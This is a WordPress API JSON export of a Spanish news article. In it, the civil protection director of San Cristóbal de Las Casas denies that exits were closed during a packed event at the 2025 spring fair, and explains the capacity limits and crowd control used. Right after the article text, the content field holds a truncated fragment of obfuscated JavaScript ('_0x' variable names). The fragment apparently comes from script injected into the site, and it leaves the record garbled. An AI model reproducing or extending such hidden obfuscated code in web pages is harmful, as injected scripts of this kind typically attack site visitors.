{"id":21559,"date":"2025-04-24T01:47:48","date_gmt":"2025-04-24T01:47:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21559"},"modified":"2025-04-24T01:47:49","modified_gmt":"2025-04-24T01:47:49","slug":"aclaran-que-no-se-cerraron-salidas-durante-evento-masivo-en-la-feria","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21559","title":{"rendered":"Aclaran que no se cerraron salidas durante evento masivo en la Feria"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"644\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250423-WA0035-644x1024.jpg\" alt=\"\" class=\"wp-image-21560\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250423-WA0035-644x1024.jpg 644w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250423-WA0035-189x300.jpg 189w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250423-WA0035-768x1221.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250423-WA0035.jpg 906w\" sizes=\"auto, (max-width: 644px) 100vw, 644px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<\/p>\n\n\n\n<p>23 de abril del 2025. San Crist\u00f3bal de Las Casas.- La Direcci\u00f3n de Protecci\u00f3n Civil Municipal desminti\u00f3 los rumores difundidos en redes sociales sobre un supuesto cierre de salidas durante el evento masivo realizado el martes por la noche en el Parque de Feria, como parte de la Feria de la Primavera y de la Paz 2025.<\/p>\n\n\n\n<p>Pablo Reyes Aguilar, titular de la dependencia, inform\u00f3 que lo que realmente ocurri\u00f3 fue la restricci\u00f3n del acceso a nuevas personas una vez que el lugar alcanz\u00f3 su aforo m\u00e1ximo permitido, conforme a las medidas de seguridad estipuladas para este tipo de concentraciones.<\/p>\n\n\n\n<p>El funcionario asegur\u00f3 que las salidas de emergencia, tanto la ubicada junto al \u00e1rea del DIF Municipal como la situada a un costado del escenario, permanecieron abiertas en todo momento. Sin embargo, explic\u00f3 que se generaron complicaciones cuando grupos de personas, al intentar ingresar a la fuerza, bloquearon dichas salidas y comenzaron a exigir su entrada, lo que ocasion\u00f3 momentos de tensi\u00f3n y dificult\u00f3 el flujo normal de asistentes.<\/p>\n\n\n\n<p>Ante esta situaci\u00f3n, elementos de la Polic\u00eda Municipal y personal de Protecci\u00f3n Civil actuaron r\u00e1pidamente formando vallas humanas para despejar los accesos y garantizar que las personas dentro del recinto pudieran salir con seguridad, principalmente por la zona pr\u00f3xima al escenario.<\/p>\n\n\n\n<p>En el acceso cercano al \u00e1rea del DIF, la situaci\u00f3n fue m\u00e1s tensa debido a la negativa de varios j\u00f3venes a retirarse, lo que provoc\u00f3 empujones. Aun as\u00ed, mediante labores de contenci\u00f3n y di\u00e1logo, se logr\u00f3 controlar el incidente y facilitar el paso a quienes deseaban abandonar el lugar.<\/p>\n\n\n\n<p>Reyes Aguilar destac\u00f3 que gracias a la intervenci\u00f3n oportuna y la coordinaci\u00f3n entre las autoridades involucradas, se logr\u00f3 preservar la seguridad de los asistentes, dando especial atenci\u00f3n a mujeres, menores de edad y personas mayores.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal 23 de abril del 2025. San Crist\u00f3bal de Las Casas.- La Direcci\u00f3n de Protecci\u00f3n Civil Municipal desminti\u00f3 los rumores difundidos en redes sociales sobre un supuesto cierre de salidas durante el evento masivo realizado el martes por la noche en el Parque de Feria, como parte de la Feria de la Primavera &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21560,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-21559","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21559","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21559"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21559\/revisions"}],"predecessor-version":[{"id":21561,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21559\/revisions\/21561"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21560"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21559"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21559"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21559"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}